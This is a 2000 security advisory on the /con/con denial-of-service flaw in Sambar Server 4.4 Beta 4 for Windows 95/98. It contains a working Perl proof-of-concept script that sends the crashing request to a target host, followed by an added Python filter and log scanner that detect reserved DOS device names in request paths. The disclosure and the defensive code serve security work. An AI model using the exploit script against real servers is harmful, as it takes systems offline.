daemon-root's security research 
Advisory Name: dae_sambar44b4
 Release Date: 10 November 2000
  Application: Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)
     Platform: Windows 95, 98
     Severity: The server is still vulnerable to the infamous /con/con exploit
       Author: daemon-root (daemon_r00t@secureroot.com)
          Web: http://www.daemon-root.da.ru


Overview:

Sambar Server is a free, multithreaded HTTP server for Windows 95/NT.
Its features include HTTP proxy, search engine, log analysis, security,
server-side scripting, and DLLs. This program includes unbuffered CGI support,
a native FTP proxy, a sacrypt encryption utility, and significantly faster
full-text indexing, yet it is still vulnerable to the infamous /con/con exploit,
as the previous versions of Sambar Server were.


Proof of concept code:

[dae_sambar44.pl]

# Sambar Server 4.4 Beta 4 Windows /con/con Exploit
#
# Bad Perl Code by: daemon-root 
# Website: http://www.daemon-root.da.ru
#
# This is for EDUCATION purposes ONLY! 

use IO::Socket;

print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";
print "=================================================\n";
if (not $ARGV[0]) {
    print "Usage: $0 [host]\n\n";
    exit(0);
}

# Open a TCP connection to port 80 on the host given as the first argument.
sub connecthost {
    $host = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $ARGV[0],
        PeerPort => "80",
    ) or die "Can't open connection to $ARGV[0] because $!\n";
    $host->autoflush(1);
}

# Request path made of two reserved DOS device names.
$exploit .= "/con/con";
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "GET $exploit HTTP/1.0\n";
print "close connection...\n";
close $host;

[END OF dae_sambar44.pl]
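
A defensive check for the request shown above, as an added example that is not part of the original advisory or of Sambar Server: it flags URL paths whose segments resolve to reserved DOS device names, so a front-end filter can refuse them and an access log can be searched for them. It goes beyond the /con/con case to the other reserved names; the device list, the log layout, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Reserved DOS device names (assumed list: the classic Windows 9x/NT set).
DEVICE = re.compile(r"(?:con|prn|aux|nul|clock\$|com[1-9]|lpt[1-9])", re.I)
REQUEST_LINE = re.compile(r"(?:GET|HEAD|POST) (\S+)")


def device_segments(raw_path):
    """Return the segments of a request path that name a DOS device."""
    path = raw_path.split("?", 1)[0]      # the query string is not a file path
    for _ in range(2):                    # undo single and double percent-encoding
        path = unquote(path)
    hits = []
    for seg in re.split(r"[/\\]", path):  # Windows accepts both separators
        # Text after the first '.' or ':' and surrounding spaces are ignored when
        # Windows resolves a device, so "con.txt" and "CON. " still mean CON.
        base = re.split(r"[.:]", seg.strip(" "), maxsplit=1)[0].strip(" ")
        if DEVICE.fullmatch(base):
            hits.append(seg)
    return hits


def should_reject(raw_path):
    """Conservative policy: refuse the request if any segment is a device."""
    return bool(device_segments(raw_path))


def scan_log(lines):
    """Yield (line_number, segments) for log lines requesting a device path."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if m and (hits := device_segments(m.group(1))):
            yield n, hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Nov/2000:12:00:01] "GET /index.htm HTTP/1.0" 200',
    '192.0.2.66 - - [10/Nov/2000:12:00:07] "GET /con/con HTTP/1.0" -',
    '192.0.2.66 - - [10/Nov/2000:12:03:40] "GET /docs/AUX.h/Nul HTTP/1.0" -',
    '192.0.2.10 - - [10/Nov/2000:12:05:12] "GET /icons/console.gif HTTP/1.0" 200',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: device segments {hits}")
```

The filter only helps when it runs before the request reaches a file-system call on the Windows 95/98 host, for example in a proxy in front of the server.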

Vendor status:

The vendor was informed on 10 November 2000.


